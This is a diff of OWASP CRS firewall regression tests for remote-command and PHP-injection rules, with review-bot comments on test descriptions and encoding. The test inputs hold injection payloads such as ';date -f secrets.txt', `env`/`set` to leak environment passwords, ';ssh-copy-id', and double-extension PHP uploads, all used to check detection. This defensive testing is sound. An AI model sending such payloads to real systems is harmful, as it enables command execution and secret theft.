@@ -959,7 +939,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 53 + - test_id: 52 desc: "Block evasion using here string with space" stages: - input: @@ -977,7 +957,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 54 + - test_id: 53 desc: "Block evasion using here string with single quotes" stages: - input: @@ -995,7 +975,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 55 + - test_id: 54 desc: "Block evasion using here string with double quotes" stages: - input: @@ -1013,7 +993,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 56 + - test_id: 55 desc: "Block evasion using here string with command substitution" stages: - input: @@ -1031,7 +1011,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 57 + - test_id: 56 desc: "Block `time` prefix" stages: - input: @@ -1049,7 +1029,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 58 + - test_id: 57 desc: "Block `strace` prefix" stages: - input: @@ -1067,7 +1047,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 59 + - test_id: 58 desc: "Known false positive with `Cut` at start of string (expected failure)" stages: - input: @@ -1085,7 +1065,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 60 + - test_id: 59 desc: "Known false positive with `Wall` at start of string" stages: - input: @@ -1102,8 +1082,8 @@ tests: sentence=Wall Street\\xe2\\x80\\x99s benchmark stock index struck an all-time high on Tuesday. output: log: - no_expect_ids: [932236] - - test_id: 61 + expect_ids: [932236] + - test_id: 60 desc: "Known false positive with `Mount` at start of string (expected failure)" stages: - input: @@ -1121,7 +1101,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 62 + - test_id: 61 desc: "Fixed false positive with `As` at start of string" stages: - input: @@ -1139,7 +1119,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 63 + - test_id: 62 desc: "Fixed false positive with `At` at start of string" stages: - input: 
@@ -1157,7 +1137,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 64 + - test_id: 63 desc: "Block `nohup` prefix" stages: - input: @@ -1175,7 +1155,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 65 + - test_id: 64 desc: "Block ad-hoc ansible commands" stages: - input: @@ -1193,7 +1173,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 66 + - test_id: 65 desc: "Block ansible config dump command" stages: - input: @@ -1211,7 +1191,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 67 + - test_id: 66 desc: "Block installing collections from ansible galaxy" stages: - input: @@ -1229,7 +1209,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 68 + - test_id: 67 desc: "Block ad-hoc ansible commands using ansible-console" stages: - input: @@ -1247,7 +1227,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 69 + - test_id: 68 desc: "Block ansible-doc command" stages: - input: @@ -1265,7 +1245,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 70 + - test_id: 69 desc: "Block dumping ansible inventory file and variables" stages: - input: @@ -1283,7 +1263,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 71 + - test_id: 70 desc: "Block ansible pull from remote repository" stages: - input: @@ -1301,7 +1281,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 72 + - test_id: 71 desc: "Block decrypting ansible secrets" stages: - input: @@ -1319,7 +1299,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 73 + - test_id: 72 desc: "Block execution of ansible playbooks" stages: - input: @@ -1337,7 +1317,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 74 + - test_id: 73 desc: "Block decryption of secrets with chef-vault" stages: - input: @@ -1355,7 +1335,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 75 + - test_id: 74 desc: "Block execution of chef-shell command" stages: - input: 
@@ -1373,7 +1353,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 76 + - test_id: 75 desc: "Block execution chef recipie book" stages: - input: @@ -1391,7 +1371,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 77 + - test_id: 76 desc: "Block execution chef recipie book against a specific node" stages: - input: @@ -1409,7 +1389,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 78 + - test_id: 77 desc: "Block execution chef command" stages: - input: @@ -1427,7 +1407,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 79 + - test_id: 78 desc: "Block execution of visudo" stages: - input: @@ -1445,7 +1425,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 80 + - test_id: 79 desc: "Block execution of CrowdSec cscli" stages: - input: @@ -1463,7 +1443,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 81 + - test_id: 80 desc: "False positive with session cookie, invalid command match with sudo" stages: - input: @@ -1480,7 +1460,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 82 + - test_id: 81 desc: "False positive with session cookie, invalid command match with fd" stages: - input: @@ -1497,7 +1477,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 83 + - test_id: 82 desc: "False positive with UUID" stages: - input: @@ -1515,7 +1495,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 84 + - test_id: 83 desc: "False positive with word identity" stages: - input: @@ -1533,7 +1513,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 85 + - test_id: 84 desc: "False positive with word unique" stages: - input: @@ -1551,7 +1531,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 86 + - test_id: 85 desc: "False positive with common argument value/name `id`." stages: - input: @@ -1569,7 +1549,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 87 + - test_id: 86 desc: | false positive with Nextcloud Mail widget. Should not match `mail`. 
@@ -1589,7 +1569,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 88 + - test_id: 87 desc: | False positive with WordPress ordering posts by date. Should not match `date`. @@ -1610,7 +1590,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 89 + - test_id: 88 desc: "Block execution of shutdown command." stages: - input: @@ -1628,7 +1608,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 90 + - test_id: 89 desc: "Don't match very long permutations of commands when using ~" stages: - input: @@ -1646,7 +1626,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 91 + - test_id: 90 desc: "Block Execution of pip3 command" stages: - input: @@ -1664,7 +1644,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 92 + - test_id: 91 desc: "Block Execution of pipx command" stages: - input: @@ -1682,7 +1662,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 93 + - test_id: 92 desc: "False Positive: matching pipe `self`" stages: - input: @@ -1700,8 +1680,24 @@ tests: output: log: no_expect_ids: [932236] + - test_id: 93 + desc: "True Positive: Block pip command" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?param=pip%20install%20something" + version: "HTTP/1.1" + output: + log: + expect_ids: [932236] - test_id: 94 - desc: "Ensure that `rc` is matched PL 2" + desc: "Match `ssh-copy-id`" stages: - input: dest_addr: 127.0.0.1 
@@ -1709,31 +1705,32 @@ tests: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Host: localhost User-Agent: "OWASP CRS test agent" - method: GET + method: POST port: 80 - uri: "/get?param=rc" + uri: "/post" version: HTTP/1.1 + data: "arg=;ssh-copy-id%20user@server" output: log: expect_ids: [932236] - test_id: 95 - desc: "True Positive: Block pip command" + desc: "Block 'rc' command" stages: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 + dest_addr: 127.0.0.1 headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?param=pip%20install%20something" - version: "HTTP/1.1" + method: GET + port: 80 + uri: "/get?param=rc%20script.sh" + version: HTTP/1.1 output: log: expect_ids: [932236] - test_id: 96 - desc: "Match `ssh-copy-id`" + desc: "TEST=echo | gcc7.4" stages: - input: dest_addr: 127.0.0.1 
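Review bot: Test 95 previously asserted that a bare `rc` parameter value is matched at PL 2 (`uri: "/get?param=rc"`); the new payload `rc%20script.sh` only covers the argument form, so if the rule was tightened to require an argument after `rc`, nothing now pins that the bare form no longer fires. Consider keeping a negative counterpart next to the new positive test, `uri: "/get?param=rc"` with `no_expect_ids: [932236]`, so the false-positive reduction is protected against regression. The rewritten test 96 block continues past the end of this hunk.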
@@ -1744,8 +1741,46 @@ tests: method: POST port: 80 uri: "/post" + data: "TEST=echo | gcc7.4" version: HTTP/1.1 - data: "arg=;ssh-copy-id%20user@server" + output: + log: + expect_ids: [932236] + - test_id: 97 + desc: | + Block execution of date command `;date -f secrets.txt` + The error message from the date command can be abused to leak the contents of a file + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: "arg=;date%20-f%20secrets.txt" + output: + log: + expect_ids: [932236] + - test_id: 98 + desc: | + Block execution of date command `;date --file secrets.txt` + The error message from the date command can be abused to leak the contents of a file + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: "arg=;date%20--file%20secrets.txt" output: log: expect_ids: [932236] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml index ec11685edd..9e6af995b2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml 
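Review bot: Test 96's body is sent raw as `TEST=echo | gcc7.4`, with a literal space and pipe in a form-urlencoded body, whereas every other payload in this hunk percent-encodes its separators (`%3B`, `%20`); whether the unencoded body goes through the same decoding path as the encoded tests depends on how go-ftw and the engine treat it, which this diff does not show. Encode it as `data: "TEST=echo%20%7C%20gcc7.4"` so the case is comparable to its siblings. The desc currently just repeats the payload; state what is asserted instead, presumably that a version-suffixed binary name (`gcc7.4`) after a pipe is still matched.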
@@ -4,36 +4,6 @@ meta: rule_id: 932237 tests: - test_id: 1 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: env - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 2 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: id - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 3 stages: - input: dest_addr: "127.0.0.1" @@ -48,7 +18,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 4 + - test_id: 2 stages: - input: dest_addr: "127.0.0.1" @@ -63,7 +33,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 5 + - test_id: 3 stages: - input: dest_addr: "127.0.0.1" @@ -78,39 +48,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 6 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: env - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 7 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: id - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 8 + - test_id: 4 stages: - input: dest_addr: "127.0.0.1" @@ -126,7 +64,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 9 + - test_id: 5 stages: - input: dest_addr: "127.0.0.1" 
@@ -142,7 +80,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 10 + - test_id: 6 stages: - input: dest_addr: "127.0.0.1" @@ -158,7 +96,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 11 + - test_id: 7 desc: "9323HNQU - should not be detected at PL 2" stages: - input: @@ -176,7 +114,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 12 + - test_id: 8 desc: "9323HNQU - should not be detected at PL 2" stages: - input: @@ -194,7 +132,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 13 + - test_id: 9 desc: "FP with word comment" stages: - input: @@ -210,7 +148,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 14 + - test_id: 10 desc: "FP with word settings" stages: - input: @@ -226,38 +164,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 15 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: set - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 16 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: set - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 17 + - test_id: 11 desc: "Block env command with arguments" stages: - input: @@ -273,7 +180,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 18 + - test_id: 12 desc: "Block env command with arguments" stages: - input: @@ -290,7 +197,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 19 + - test_id: 13 desc: "Block ad-hoc ansible commands" stages: - input: 
@@ -306,7 +213,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 20 + - test_id: 14 desc: "Block ansible config dump command" stages: - input: @@ -322,7 +229,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 21 + - test_id: 15 desc: "Block installing collections from ansible galaxy" stages: - input: @@ -338,7 +245,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 22 + - test_id: 16 desc: "Block ad-hoc ansible commands using ansible-console" stages: - input: @@ -354,7 +261,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 23 + - test_id: 17 desc: "Block ansible-doc command" stages: - input: @@ -370,7 +277,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 24 + - test_id: 18 desc: "Block dumping ansible inventory file and variables" stages: - input: @@ -386,7 +293,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 25 + - test_id: 19 desc: "Block ansible pull from remote repository" stages: - input: @@ -402,7 +309,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 26 + - test_id: 20 desc: "Block decrypting ansible secrets" stages: - input: @@ -418,7 +325,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 27 + - test_id: 21 desc: "Block execution of ansible playbooks" stages: - input: @@ -434,7 +341,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 28 + - test_id: 22 desc: "Block decryption of secrets with chef-vault" stages: - input: @@ -450,7 +357,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 29 + - test_id: 23 desc: "Block execution of chef-shell command" stages: - input: @@ -466,7 +373,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 30 + - test_id: 24 desc: "Block execution chef recipie book" stages: - input: @@ -482,7 +389,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 31 + - test_id: 25 desc: "Block execution chef recipie book against a specific node" stages: - input: 
@@ -498,7 +405,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 32 + - test_id: 26 desc: "Block execution chef command" stages: - input: @@ -514,7 +421,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 33 + - test_id: 27 desc: "Block execution of visudo" stages: - input: @@ -530,7 +437,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 34 + - test_id: 28 desc: "Block execution of CrowdSec cscli" stages: - input: @@ -546,7 +453,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 35 + - test_id: 29 desc: | False positive with Nextcloud iOS user-agent. Should not match `ip`. @@ -564,7 +471,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 36 + - test_id: 30 desc: | False positive with token in referrer. Should not match `df`. @@ -583,7 +490,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 37 + - test_id: 31 desc: | False positive with Android user-agent. Should not match `pg`. @@ -601,7 +508,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 38 + - test_id: 32 desc: | False positive with Pashto Afghanistan User-Agent Should not match `ps` in `ps-af`. @@ -619,3 +526,21 @@ tests: output: log: no_expect_ids: [932237] + - test_id: 33 + desc: "Negative test on known user-agent" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Cpanel-HTTP-Client/1.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932237] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932340.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932340.yaml new file mode 100644 index 0000000000..68c163d309 --- /dev/null +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932340.yaml 
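Review bot: Test 33's desc, "Negative test on known user-agent", does not say which command word the `Cpanel-HTTP-Client/1.0` User-Agent must not trigger, whereas the neighbouring negative tests 29–32 each name the substring ("Should not match `ip`", "`df`", "`pg`", "`ps`"). Presumably the concern is `cp` inside `Cpanel`; if so, write it as a block desc, `False positive with cPanel HTTP client user-agent.` / `Should not match `cp` in `Cpanel`.`, so a future failure points straight at the offending word.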
@@ -0,0 +1,170 @@ +--- +meta: + author: "Esad Cetiner, Max Leske, Franziska Bühler" +rule_id: 932340 +tests: + - test_id: 1 + desc: "/?arg=;ps" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%3Bps" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 2 + desc: | + Block execution of `env` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: env + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 3 + desc: | + Block execution of `env` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: env + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 4 + desc: | + Block execution of `set` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: set + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 5 + desc: | + Block 
execution of `set` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: set + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 6 + desc: "/?arg=&aptitude" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26aptitude" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 7 + desc: | + False Positive with `id` command + `id` is a very common parameter name + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "id=4" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932340] + - test_id: 8 + desc: | + False Positive with `pwd` command + `pwd` is a common parameter name for passwords + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "pwd=supersecurepassword" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932340] + - test_id: 9 + desc: | + False Positive with `uname` command + `uname` is a common parameter name for usernames + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "uname=john%20doe" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932340] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932350.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932350.yaml new file mode 100644 index 0000000000..93806d25eb --- /dev/null +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932350.yaml 
@@ -0,0 +1,81 @@ +--- +meta: + author: "Esad Cetiner, Max Leske" +rule_id: 932350 +tests: + - test_id: 1 + desc: | + Block execution of `id` command + `id` is a very common parameter name so we only block at PL-3 + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "id=4" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] + - test_id: 2 + desc: | + Block execution of `id` command + `id` is a very common parameter name so we only block at PL-3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: id + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] + - test_id: 3 + desc: | + Block execution of `id` command + `id` is a very common parameter name so we only block at PL-3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: id + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] + - test_id: 4 + desc: RCE ;top with html entities two digit decimal of 59 (;) + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log: + 
expect_ids: [932350] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index 9901ec55e1..7c6ca95ae2 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -1,6 +1,6 @@ --- meta: - author: "NiceYouKnow, azurit" + author: "NiceYouKnow, azurit, touchweb_vincent" rule_id: 933111 tests: - test_id: 1 @@ -28,3 +28,53 @@ tests: output: log: expect_ids: [933111] + - test_id: 2 + desc: "PHP Injection Attack: PHP Script File Upload Found" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoRWIb3busvBrbttO + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: | + ------WebKitFormBoundaryoRWIb3busvBrbttO + Content-Disposition: form-data; name="file"; filename="test.php7.gif" + Content-Type: image/gif + + + + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log: + expect_ids: [933111] + - test_id: 3 + desc: "PHP Injection Attack: PHP Script File Upload Found" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoRWIb3busvBrbttO + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: | + ------WebKitFormBoundaryoRWIb3busvBrbttO + Content-Disposition: form-data; name="file"; filename="test.phar.png" + Content-Type: image/png + + + + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log: + expect_ids: [933111] 
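Review bot: Test 4 was moved here from 932236 together with its old desc, "RCE ;top with html entities two digit decimal of 59 (;)", which no longer explains why the case now lives in a PL-3 rule, while tests 1–3 in the same file do explain the PL choice for `id`. The payload `arg=%26%2359%3B+;top` also contains a literal `;top` after the HTML entity `&#59;`, so the entity is not what the match depends on. Suggest `desc: "Block `top` command (matched at PL-3 only); payload also carries an HTML-entity-encoded semicolon"`, assuming that is the reason for the move — the rule file is not in this diff.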
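Review bot: Tests 2 and 3 carry the identical desc "PHP Injection Attack: PHP Script File Upload Found", so a failure report cannot tell the `test.php7.gif` double-extension case from the `test.phar.png` case. Name the variant in each, e.g. `desc: "PHP script upload: versioned extension hidden behind .gif (test.php7.gif)"` and `desc: "PHP script upload: .phar archive hidden behind .png (test.phar.png)"`. The multipart body is a `|` block scalar, so part boundaries are separated by LF rather than the CRLF multipart expects, and the file part is empty; this may be fine if go-ftw normalises line endings, but a one-line comment stating that the tests exercise only the `filename=` header, not the file content, would pre-empt the question.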
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 497ce73c10..9e18cde878 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -4,22 +4,6 @@ meta: rule_id: 933150 tests: - test_id: 1 - desc: phpinfo - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/phpinfo" - version: "HTTP/1.1" - output: - log: - expect_ids: [933150] - - test_id: 2 desc: base64_decode stages: - input: @@ -30,12 +14,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get/base64_decode" + uri: "/get/?test=base64_decode()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 3 + - test_id: 2 desc: base64_decode mixed case stages: - input: @@ -46,12 +30,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?base64_deCOde" + uri: "/get?base64_deCOde()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 4 + - test_id: 3 desc: bzdecompress stages: - input: @@ -62,12 +46,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=bzdecomprEss" + uri: "/get?foo=bzdecomprEss()" version: "HTTP/1.1" output: log: expect_ids: [933150] 